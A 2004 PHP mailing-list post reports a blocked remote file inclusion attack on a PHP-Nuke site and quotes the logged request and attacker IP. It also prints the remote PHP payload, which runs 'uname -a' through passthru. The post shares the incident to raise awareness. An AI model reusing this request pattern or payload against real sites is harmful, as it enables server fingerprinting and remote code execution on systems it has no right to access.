This is of questionable relevance, but I'm sure it can serve to heighten awareness of vulnerabilities for those PHP'ers with similar scripts that involve loading files based upon query string info.
We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure recently sent us an email of a thwarted hacking attempt: -------------------------------------------------------- Admin Secure detecting invalid file inclusion passed to index.php or modules.php files. This could be possible cross-site scripting (XSS) hack attempt to your site. For security reason, this attempt has been blocked by Admin Secure to protect your website. Admin Secure has been collecting the following information: - Date: 26 September 2004, 01:05 - IP Address: 193.150.170.160 - User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled) - Request: /modules.php?name=http://193.150.170.160/4do4sjr?&sa=http://193.150.170.160/4do4sjr?&year=http://193.150.170.160/4do4sjr?&month=http://193.150.170.160/4do4sjr?&month_l=http://193.150.170.160/4do4sjr? - Variable: $name = http://193.150.170.160/4do4sjr? Whois Information..... ------------------------------------------------------- The link he was trying to get our scripts to load, http://193.150.170.160/4do4sjr? , displays this: <?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?> Which would, from what I've read about the uname command, give him info about our web server, and from there he would have an idea of which vulnerabilities to exploit. ---------------------------------------------------- What would you guys do with the attack information (IP, WHOIS)? Send a detailed email to the addresses listed in the WHOIS records? I'm not sweating it, just curious. Thank you, ~Jason -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
